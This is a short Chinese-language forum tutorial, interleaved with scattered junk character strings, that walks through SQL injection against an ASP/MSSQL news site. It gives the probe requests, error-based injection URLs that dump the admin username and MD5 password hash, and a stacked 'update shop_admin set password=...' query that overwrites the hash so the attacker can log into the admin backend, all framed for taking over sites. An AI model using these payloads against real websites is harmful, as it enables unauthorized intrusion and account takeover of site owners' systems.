经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
y: U; ^$ y6 _* H9 t9 n* a' z可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
3 ]2 r% A* e6 g% w6 J测试如下:$ f# N- k' @& I1 W
http://www.tmdsb.com/news.asp?id=121
* J/ Y- s9 ^# q: C# n在地址后输入单引号,显示
7 |' w- W- Y3 k/ [Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’" H2 H* V, D! W+ v
字符串 ’’’ 之前有未闭合的引号# q% ^: @9 v9 {- r# h [
/news/tmdws.asp,行63
. W \( \9 |# @ D7 l: v) O5 G说明没有过滤单引号且数据库是MSSQL.
8 r1 _. Z* \) y% F% ^! F* C% Kand 1=1正常。and 1=2出错。肯定存在注入
' Z7 a3 V% a: ^# j* g+ O, G9 ~% b接着输入
9 H4 A. Y0 s+ E ~! Khttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
" p% E* `) @ @" ~1 O得到帐号为:admin
! i4 B* [/ L, ?! Z. ^ g' Whttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)5 X5 N. h2 e' d( S9 u5 x
得到密码为:a4716077c2ba075c4 n; y- m2 N: H9 T( X8 S
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
7 r8 Z1 H6 E3 O+ u9 U( n3 p命令如下 :
7 o( R' f& T) D0 B$ n+ x; E$ F! B, J;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–) a9 f" }/ _% [( w: d" \% W
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |